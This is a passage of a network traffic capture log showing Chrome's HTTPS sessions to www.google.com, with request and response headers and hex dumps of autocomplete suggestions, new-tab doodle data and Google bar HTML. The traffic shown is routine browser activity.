2024-11-15 13:09:15 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-15 13:09:15 UTC	1266	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:15 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-WX6i32BnVToOifi2UPWLYw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-15 13:09:15 UTC	112	IN	Data Raw: 32 66 33 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 32 30 32 35 20 61 63 75 72 61 20 61 64 78 20 73 75 76 22 2c 22 74 68 65 20 6a 61 63 6b 61 6c 20 70 65 61 63 6f 63 6b 20 65 70 69 73 6f 64 65 73 22 2c 22 73 74 65 61 6c 74 68 79 20 73 6f 61 72 20 6d 6f 6e 6f 70 6f 6c 79 20 67 6f 20 72 65 77 61 72 64 73 22 2c 22 6e 79 63 20 66 69 72 65 20 Data Ascii: 2f3)]}'["",["2025 acura adx suv","the jackal peacock episodes","stealthy soar monopoly go rewards","nyc fire
2024-11-15 13:09:15 UTC	650	IN	Data Raw: 68 75 64 73 6f 6e 20 79 61 72 64 73 22 2c 22 61 6c 6c 20 6d 6c 62 20 74 65 61 6d 73 22 2c 22 6e 76 69 64 69 61 20 73 74 6f 63 6b 20 70 72 69 63 65 22 2c 22 64 72 61 67 6f 6e 20 71 75 65 73 74 20 33 20 68 64 20 32 64 20 72 65 6d 61 6b 65 22 2c 22 70 6f 72 74 75 67 61 6c 20 66 6c 6f 6f 64 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 Data Ascii: hudson yards","all mlb teams","nvidia stock price","dragon quest 3 hd 2d remake","portugal floods"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggest
2024-11-15 13:09:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	142.250.185.68	443	7228	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:09:15 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-15 13:09:15 UTC	1018	IN	HTTP/1.1 200 OK Version: 695623535 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 15 Nov 2024 13:09:15 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-15 13:09:15 UTC	360	IN	Data Raw: 31 30 35 64 0d 0a 29 5d 7d 27 0a 7b 22 64 64 6c 6a 73 6f 6e 22 3a 7b 22 61 63 63 65 73 73 69 62 69 6c 69 74 79 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 61 6c 74 5f 74 65 78 74 22 3a 22 43 65 6c 65 62 72 61 74 69 6e 67 20 74 68 65 20 4b 61 79 61 6b 22 2c 22 64 61 72 6b 5f 64 61 74 61 5f 75 72 69 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 66 51 41 41 41 44 49 43 41 4d 41 41 41 41 70 78 2b 50 61 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 77 42 51 54 46 52 46 52 33 42 4d 2f 2f 2f 2f 2f 33 39 2f 77 71 79 62 77 71 32 64 78 71 36 63 78 36 79 63 78 71 32 63 78 71 32 63 78 71 32 63 78 71 32 63 78 71 32 63 78 71 32 63 78 71 79 Data Ascii: 105d)]}'{"ddljson":{"accessibility_description":"","alt_text":"Celebrating the Kayak","dark_data_uri":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAfQAAADICAMAAAApx+PaAAAAAXNSR0IArs4c6QAAAwBQTFRFR3BM/////39/wqybwq2dxq6cx6ycxq2cxq2cxq2cxq2cxq2cxq2cxqy
2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 37 4d 75 35 36 4d 79 33 35 73 71 32 36 4d 65 32 35 4d 6d 30 34 63 65 7a 35 63 53 7a 7a 63 36 36 33 38 53 78 31 63 65 32 34 63 47 77 33 63 4b 76 7a 63 69 31 33 72 36 75 32 63 43 73 32 62 32 72 7a 4d 4b 77 31 62 79 70 32 4c 71 71 30 72 71 6e 31 62 65 6e 7a 37 65 6c 30 72 53 6b 7a 62 57 6a 7a 37 4b 69 79 37 4f 68 79 62 4b 65 7a 4c 43 67 79 4c 47 66 79 4c 47 65 79 4c 47 64 78 37 47 64 78 37 43 65 78 37 43 64 79 71 36 65 79 4b 2b 64 78 72 43 64 79 36 32 65 79 61 36 64 78 61 2b 69 78 71 2b 64 79 61 32 64 78 36 36 64 78 61 2b 64 79 4b 32 62 79 61 79 64 78 36 32 64 78 61 36 64 78 61 36 63 78 36 32 62 78 61 32 67 79 4b 79 64 78 71 32 64 78 4b 36 64 79 4b 79 63 78 71 32 63 78 4b 36 63 79 61 75 64 78 36 79 64 78 61 32 64 78 71 79 64 78 4b 32 64 78 36 79 61 78 71 79 Data Ascii: 7Mu56My35sq26Me25Mm04cez5cSzzc6638Sx1ce24cGw3cKvzci13r6u2cCs2b2rzMKw1byp2Lqq0rqn1benz7el0rSkzbWjz7Kiy7OhybKezLCgyLGfyLGeyLGdx7Gdx7Cex7Cdyq6eyK+dxrCdy62eya6dxa+ixq+dya2dx66dxa+dyK2byaydx62dxa6dxa6cx62bxa2gyKydxq2dxK6dyKycxq2cxK6cyaudx6ydxa2dxqydxK2dx6yaxqy
2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 55 51 6a 44 4e 4f 42 4b 4f 63 47 35 7a 46 4d 51 63 4b 36 67 42 43 48 51 45 49 7a 6b 47 59 77 31 6e 4f 2f 52 76 41 6d 57 4f 65 6c 45 4a 36 67 67 64 52 45 44 5a 43 34 59 52 67 30 68 65 55 4d 6b 45 4d 47 4b 63 57 41 4b 50 55 41 63 78 42 45 4d 2f 67 66 77 33 71 38 4f 38 34 39 35 39 65 63 2f 43 44 71 42 6e 4c 5a 69 7a 38 79 41 73 39 33 32 64 4d 2b 44 49 49 66 65 48 35 51 67 72 42 47 48 4f 4d 4d 2b 71 34 68 62 44 33 43 4c 57 4d 4f 50 77 37 33 50 37 50 57 35 44 77 4a 48 4f 55 4d 57 59 68 70 47 53 4d 55 6e 69 53 79 63 44 6e 68 46 6a 38 4c 2f 44 4d 50 59 38 45 41 4c 67 76 4c 61 51 4d 7a 69 78 7a 45 44 59 66 6b 50 6e 58 46 50 66 50 43 42 47 52 78 34 55 51 2f 2f 4e 33 63 49 4a 54 6f 6e 47 65 6b 50 4f 31 44 55 6f 64 42 62 6a 77 53 57 30 4a 31 59 54 62 32 6c 6c 44 67 Data Ascii: UQjDNOBKOcG5zFMQcK6gBCHQEIzkGYw1nO/RvAmWOelEJ6ggdREDZC4YRg0heUMkEMGKcWAKPUAcxBEM/gfw3q8O84959ec/CDqBnLZiz8yAs932dM+DIIfeH5QgrBGHOMM+q4hbD3CLWMOPw73P7PW5DwJHOUMWYhpGSMUniSycDnhFj8L/DMPY8EALgvLaQMzixzEDYfkPnXFPfPCBGRx4UQ//N3cIJTonGekPO1DUodBbjwSW0J1YTb2llDg
2024-11-15 13:09:15 UTC	1081	IN	Data Raw: 53 47 41 41 64 44 43 33 44 48 49 77 56 61 79 4a 30 67 46 41 70 2b 79 4b 6f 6c 55 64 69 36 72 2b 4c 75 67 59 30 6c 75 4f 4e 6e 64 59 77 44 68 49 4c 4f 71 4a 62 76 73 7a 75 4c 50 71 67 45 62 6d 34 68 72 34 79 41 39 38 34 48 36 4d 49 7a 43 6f 7a 68 67 31 51 56 41 37 6c 78 56 77 67 30 5a 52 52 31 6b 65 43 6c 38 44 56 4a 31 65 4a 75 65 6b 49 38 43 43 48 5a 42 45 7a 36 61 61 2b 37 6d 4c 67 52 6e 6e 64 54 4f 61 31 43 34 72 49 4d 37 6c 6b 34 67 61 70 77 32 54 53 68 76 50 56 34 41 73 41 56 67 77 47 4b 41 54 4a 31 41 6f 59 55 46 39 41 42 6e 52 6c 41 4d 56 69 35 43 78 56 6d 65 61 4f 42 38 6c 37 46 6e 2f 43 5a 78 75 79 48 69 55 4f 51 35 59 77 42 49 65 41 30 6e 63 47 53 6f 59 44 54 43 77 46 70 41 41 67 45 4d 6c 70 59 51 43 50 47 30 56 41 4d 31 61 4b 6e 4d 63 66 6a 39 Data Ascii: SGAAdDC3DHIwVayJ0gFAp+yKolUdi6r+LugY0luONndYwDhILOqJbvszuLPqgEbm4hr4yA984H6MIzCozhg1QVA7lxVwg0ZRR1keCl8DVJ1eJuekI8CCHZBEz6aa+7mLgRnndTOa1C4rIM7lk4gapw2TShvPV4AsAVgwGKATJ1AoYUF9ABnRlAMVi5CxVmeaOB8l7Fn/CZxuyHiUOQ5YwBIeA0ncGSoYDTCwFpAAgEMlpYQCPG0VAM1aKnMcfj9
2024-11-15 13:09:15 UTC	169	IN	Data Raw: 61 33 0d 0a 7a 57 64 42 6e 51 37 54 4c 55 6a 48 65 37 4e 4d 4a 65 6d 6f 73 62 51 47 34 64 57 38 2b 31 56 67 56 76 4a 77 74 42 69 59 42 6f 50 4f 6d 57 48 50 54 61 6d 6f 4f 52 35 76 41 66 6c 61 35 44 45 31 42 73 6f 6d 6f 59 36 47 6d 57 51 45 53 37 4f 4e 35 56 6f 45 76 63 2b 57 64 33 4c 65 58 39 75 75 6f 6e 5a 2f 77 31 69 30 49 4c 41 64 6d 4d 39 33 30 4e 79 45 35 41 6d 77 6b 57 63 64 53 6c 6b 70 62 31 6d 6d 48 35 4b 59 69 67 46 2b 78 57 6c 48 70 70 55 69 46 78 49 4b 46 52 67 45 36 30 6d 59 70 4d 6f 0d 0a Data Ascii: a3zWdBnQ7TLUjHe7NMJemosbQG4dW8+1VgVvJwtBiYBoPOmWHPTamoOR5vAfla5DE1BsomoY6GmWQES7ON5VoEvc+Wd3LeX9uuonZ/w1i0ILAdmM930NyE5AmwkWcdSlkpb1mmH5KYigF+xWlHppUiFxIKFRgE60mYpMo
2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 35 34 39 39 0d 0a 6e 43 50 57 74 75 42 79 59 42 6b 6a 50 72 67 34 4b 55 6d 4a 74 49 4b 75 42 4d 30 6e 4f 63 46 52 76 33 6b 30 51 43 63 67 35 6a 37 6d 6e 58 4b 44 55 4e 37 34 33 43 49 66 34 74 43 69 55 51 4a 34 6b 42 6d 41 53 6b 55 73 35 50 37 34 31 43 53 45 42 6c 72 41 55 6f 5a 51 41 6d 70 63 72 50 52 61 48 76 41 77 57 41 4c 38 38 79 2b 31 32 54 6a 75 61 6a 4a 49 42 45 47 30 68 49 46 46 51 7a 51 7a 52 33 7a 48 41 59 33 50 73 42 6f 51 41 70 35 31 58 63 42 30 59 4b 55 6d 6b 47 45 38 6b 45 53 31 58 64 39 42 4b 6c 58 45 76 6c 6c 70 42 51 49 6f 6b 54 31 65 38 4d 35 5a 54 46 36 4a 67 45 2b 4c 65 45 54 78 43 54 73 74 65 61 70 77 32 58 74 41 6a 4c 4b 6b 4c 38 4a 76 4d 71 6b 2f 41 77 79 6e 4f 58 2b 51 55 36 6d 4a 55 59 69 43 71 72 6d 68 36 6b 6c 30 38 37 31 43 75 Data Ascii: 5499nCPWtuByYBkjPrg4KUmJtIKuBM0nOcFRv3k0QCcg5j7mnXKDUN743CIf4tCiUQJ4kBmASkUs5P741CSEBlrAUoZQAmpcrPRaHvAwWAL88y+12TjuajJIBEG0hIFFQzQzR3zHAY3PsBoQAp51XcB0YKUmkGE8kES1Xd9BKlXEvllpBQIokT1e8M5ZTF6JgE+LeETxCTsteapw2XtAjLKkL8JvMqk/AwynOX+QU6mJUYiCqrmh6kl0871Cu
2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 71 2b 77 66 34 59 7a 71 68 61 51 4a 59 52 6a 74 32 39 39 52 35 2b 35 46 42 71 57 4a 30 77 45 77 4d 64 6c 39 67 51 44 6c 51 44 4e 58 7a 46 4b 4b 78 42 6c 6e 53 4d 79 30 69 73 41 57 6c 6c 75 67 43 42 6f 43 6d 30 79 57 48 42 6e 49 61 6d 6e 71 30 4d 51 47 68 6c 59 42 78 68 72 48 4c 67 72 48 44 63 4d 78 70 68 5a 54 78 4f 71 61 57 77 76 41 45 4a 42 54 68 69 4e 4e 63 4d 48 4d 61 62 71 38 4a 30 48 6c 4e 2f 6f 6c 57 4d 79 66 72 46 64 35 78 4a 65 79 67 46 69 5a 4c 49 4c 4a 49 4a 59 74 53 38 69 62 46 79 72 63 46 33 39 69 70 51 52 75 41 78 43 46 68 71 44 62 4f 4f 61 49 62 4b 4d 47 4d 59 4d 77 79 4b 68 59 33 72 6b 4f 77 32 65 42 4b 47 6d 46 61 45 66 47 6b 32 2b 2b 35 49 46 37 4c 35 6f 4e 4b 43 78 55 6e 64 67 4e 49 52 6f 47 52 2f 2b 51 73 37 72 4d 30 66 52 55 56 66 2b Data Ascii: q+wf4YzqhaQJYRjt299R5+5FBqWJ0wEwMdl9gQDlQDNXzFKKxBlnSMy0isAWllugCBoCm0yWHBnIamnq0MQGhlYBxhrHLgrHDcMxphZTxOqaWwvAEJBThiNNcMHMabq8J0HlN/olWMyfrFd5xJeygFiZLILJIJYtS8ibFyrcF39ipQRuAxCFhqDbOOaIbKMGMYMwyKhY3rkOw2eBKGmFaEfGk2++5IF7L5oNKCxUndgNIRoGR/+Qs7rM0fRUVf+
2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 6c 4b 37 4a 36 68 4a 5a 51 43 66 71 36 48 2b 2f 33 6b 71 42 2f 79 50 65 39 56 73 50 63 6f 33 46 54 50 4d 32 39 6a 6a 44 46 33 66 31 64 30 4d 36 4a 33 37 72 47 75 51 64 6a 49 57 55 69 55 54 75 31 6d 39 4a 66 2b 38 5a 71 4a 7a 45 76 59 7a 36 2b 4a 39 52 56 78 48 75 52 59 4d 44 78 75 61 62 52 36 54 4a 4b 79 36 32 6e 68 74 49 68 30 67 43 55 44 6a 4c 67 57 39 74 76 65 43 4b 4a 35 31 59 55 72 53 7a 52 64 59 4b 49 35 31 58 37 61 7a 54 33 54 75 57 31 32 66 72 34 30 2f 66 2b 75 62 65 77 32 65 7a 52 64 33 4a 4f 61 41 59 6a 43 64 79 45 54 64 51 6c 61 6d 77 42 51 41 4a 33 51 71 6e 69 67 46 69 31 58 7a 6d 4d 59 38 39 6c 4b 48 6b 67 41 48 54 41 49 64 41 66 64 61 2b 37 70 58 6a 77 57 31 2f 62 42 37 38 4c 62 61 4f 41 68 6f 58 68 48 59 6d 53 2b 45 5a 48 33 57 56 56 41 78 Data Ascii: lK7J6hJZQCfq6H+/3kqB/yPe9VsPco3FTPM29jjDF3f1d0M6J37rGuQdjIWUiUTu1m9Jf+8ZqJzEvYz6+J9RVxHuRYMDxuabR6TJKy62nhtIh0gCUDjLgW9tveCKJ51YUrSzRdYKI51X7azT3TuW12fr40/f+ubew2ezRd3JOaAYjCdyETdQlamwBQAJ3QqnigFi1XzmMY89lKHkgAHTAIdAfda+7pXjwW1/bB78LbaOAhoXhHYmS+EZH3WVVAx
2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 4d 51 56 6e 44 63 4b 33 41 39 52 67 72 41 51 41 34 6e 63 39 6e 6e 6e 34 74 66 63 36 46 78 6e 4e 72 33 2f 59 6e 73 50 6f 51 61 71 6e 49 2f 32 45 75 6e 65 43 32 2b 2f 32 44 7a 55 61 59 42 48 48 6e 48 79 39 2f 77 74 46 30 43 6c 6e 6e 31 45 54 32 42 57 75 77 48 77 6b 59 7a 71 31 48 76 67 45 61 49 4b 4a 52 76 57 2b 56 74 7a 33 6b 53 5a 68 34 68 59 41 4b 57 47 41 2b 57 41 70 43 57 55 69 6f 41 44 52 53 38 61 50 33 65 62 33 7a 35 34 61 34 52 55 33 64 79 2f 79 57 38 6f 71 78 53 7a 42 53 46 4d 37 34 77 67 57 4b 71 46 72 34 49 49 61 7a 64 54 50 2f 6b 43 48 49 69 47 62 43 34 37 62 62 4e 54 78 69 57 46 64 43 45 73 63 72 7a 79 34 6f 78 46 73 41 44 62 34 46 46 6d 57 45 52 6c 43 79 4e 63 63 78 59 66 41 72 76 41 53 41 76 79 73 64 6e 58 6b 64 5a 6d 42 38 56 75 78 66 68 50 Data Ascii: MQVnDcK3A9RgrAQA4nc9nnn4tfc6FxnNr3/YnsPoQaqnI/2EuneC2+/2DzUaYBHHnHy9/wtF0Clnn1ET2BWuwHwkYzq1HvgEaIKJRvW+Vtz3kSZh4hYAKWGA+WApCWUioADRS8aP3eb3z54a4RU3dy/yW8oqxSzBSFM74wgWKqFr4IIazdTP/kCHIiGbC47bbNTxiWFdCEscrzy4oxFsADb4FFmWERlCyNccxYfArvASAvysdnXkdZmB8VuxfhP
2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 65 48 71 74 67 2b 54 6e 7a 6a 67 58 68 6f 45 5a 56 46 58 67 50 42 67 45 4e 66 4d 71 46 41 79 73 59 45 49 72 61 59 44 79 34 62 76 76 66 6e 52 56 6c 73 67 37 54 48 57 72 72 45 6d 4e 50 46 42 70 79 6e 58 6f 6d 39 77 6e 47 41 4d 69 57 76 7a 4d 68 65 4a 43 5a 38 51 62 66 6d 39 77 33 61 6e 36 66 77 49 51 62 54 31 46 45 73 75 7a 35 6b 61 6c 49 78 48 4f 6f 61 42 67 4f 6b 50 49 65 36 4c 77 6a 46 68 41 71 54 68 4f 4d 42 32 7a 41 46 7a 66 53 71 38 59 79 6e 34 43 78 4b 4f 79 70 59 7a 4f 47 50 78 6f 68 6a 4f 55 58 67 4d 56 63 4d 45 30 41 51 5a 54 49 41 46 41 4e 53 2b 50 4b 65 38 6e 2f 76 71 78 77 4a 50 76 2b 2b 76 76 65 4f 77 64 63 39 6e 66 5a 42 75 4a 6a 4c 47 70 7a 49 51 6d 38 46 48 52 4f 76 58 6c 68 68 4a 4a 6d 32 78 69 33 64 4c 76 30 75 46 53 6c 43 34 39 2b 52 53 Data Ascii: eHqtg+TnzjgXhoEZVFXgPBgENfMqFAysYEIraYDy4bvvfnRVlsg7THWrrEmNPFBpynXom9wnGAMiWvzMheJCZ8Qbfm9w3an6fwIQbT1FEsuz5kalIxHOoaBgOkPIe6LwjFhAqThOMB2zAFzfSq8Yyn4CxKOypYzOGPxohjOUXgMVcME0AQZTIAFANS+PKe8n/vqxwJPv++vveOwdc9nfZBuJjLGpzIQm8FHROvXlhhJJm2xi3dLv0uFSlC49+RS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	142.250.185.68	443	7228	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:09:15 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-15 13:09:15 UTC	1119	IN	HTTP/1.1 200 OK Version: 695623535 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Save-Data Accept-CH: Downlink Accept-CH: ECT Accept-CH: RTT Accept-CH: Device-Memory Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 15 Nov 2024 13:09:15 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-15 13:09:15 UTC	259	IN	Data Raw: 32 33 39 30 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2390)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 50 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 6b 64 20 67 62 5f 6f 64 20 67 62 5f 46 64 20 67 62 5f 6c 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 Data Ascii: 3cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"but
2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 69 61 2d 68 69 64 64 65 6e 5c 75 30 30 33 64 5c 22 74 72 75 65 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 Data Ascii: ia-hidden\u003d\"true\" role\u003d\"presentation\"\u003e\u003c\/span\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u
